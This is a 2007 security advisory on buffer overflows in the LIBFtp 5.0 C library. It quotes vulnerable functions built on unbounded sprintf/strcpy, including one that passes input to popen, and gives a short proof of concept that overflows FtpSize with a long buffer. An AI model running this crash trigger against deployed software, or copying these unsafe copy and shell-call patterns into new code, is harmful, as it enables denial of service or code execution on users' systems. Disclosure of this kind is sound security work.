LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow

2007.03.21
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

http://www.netsw.org/net/ip/filetrans/ftp/libftp/ >> Description the library has a multiple (sprintf(), strcpy()) buffer overflow in various functions. >> Source errors fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize() the FtpString is a typedef of an array with 256bytes: FtpLibrary.h: typedef char FtpString[256]; .. STATUS FtpChmod(FTP *ftp,char *file,int mode) { FtpString msg; sprintf(msg,"SITE CHMOD %03o %s",mode,file); return FtpCommand(ftp,msg,"",200,EOF); } .. int FtpArchie ( char *what, ARCHIE *result, int len) { FILE *archie; FtpString cmd,tmp; int i; bzero(result,sizeof(result[0])*len); sprintf(cmd,"archie -t -l -m %d %s",len,what); if ((archie = popen(cmd,"r"))==NULL) return 0; .. STATUS FtpDebugDebug(FTP *ftp,int n, char * Message) { FtpString tmp; strcpy(tmp,Message); if (strncmp(tmp,"PASS ",5)==0) { char *p=tmp+5; while ( *p != '\0') *p++='*'; }; .. STATUS FtpOpenDir(FTP * con,char * file) { FtpString command; if ( file == NULL || *file == '\0' ) strcpy(command,"NLST"); else sprintf(command,"NLST %s",file); return FtpCommand(con,command,"",120,150,200,EOF); } .. int FtpSize(FTP * con, char *filename) { FtpString tmp; int i,size; strcpy(tmp,"SIZE "); strcat(tmp,filename); if ( FtpSendMessage(con,tmp) == QUIT ) return EXIT(con,QUIT); .. >> POC #include <FtpLibrary.h> #define OVF_BUF (270) int main() { char *buf; buf = (char *) malloc(OVF_BUF+1); memset(buf, 'A', OVF_BUF); // insert function to init ftp connection.. // insert function to manage ftp connection.. // calling vulnerable function example FtpSize() FtpSize(NULL, buf); // insert function to close ftp connection.. return(0); } -- ~ starcadi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top